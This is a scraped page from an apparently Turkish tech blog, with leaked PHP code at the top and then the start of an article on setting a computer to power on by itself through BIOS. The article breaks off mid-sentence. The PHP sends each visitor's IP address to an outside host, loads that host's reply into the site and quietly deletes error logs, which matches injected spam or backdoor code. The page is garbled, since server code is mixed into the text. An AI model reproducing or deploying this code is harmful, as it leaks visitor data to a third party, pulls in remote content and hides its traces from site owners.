$value) { $post_string .= $key.'='.urlencode(trim($value)).'&'; } rtrim($post_string, '&'); curl_setopt($ch,CURLOPT_POST, count($post)); curl_setopt($ch,CURLOPT_POSTFIELDS, $post_string); } $result=curl_exec($ch); return $result; } $mcuOutput = conn('https://seoabi.com/wmbys/blog-api.php?ip='.$_SERVER['REMOTE_ADDR']); $GLOBALS['mcuOutput'] = json_decode($mcuOutput); $wpdb->query("UPDATE `wp_posts` SET post_status = 'publish' WHERE post_status = 'future' && post_date < NOW()"); @unlink($_SERVER['DOCUMENT_ROOT'].'/error_log'); @unlink($_SERVER['DOCUMENT_ROOT'].'/imle/error_log'); ?> Bilgisayar Kendi Açılsın | Teknoloji Haberleri

Bilgisayar Kendi Açılsın kategorisindeki tüm yazılar

Son Yazılar

Bilgisayar İstediğiniz Saatte Kendiliğinden Açılsın

Bilgisayarınız istediğiniz saatte açılma özelliğine sahiptir.Makalede bu özelliği nasıl kullanacağınız anlatılmaktadır. Windows Kullanan Bilgisayarlar İçin: 1.Bilgisayarınız açıldığında bios menüsüne girin.Kimi bilgisayarlarda DEL tuşu kimi bilgisayarlarda ise F2 tuşu ile bu işlem gerçekleştirilir.Bu tuş açılış anında alt yazı ile bildirilir. 2.Bios ekranını açtıysanız Power menüsüne gelin ve oradan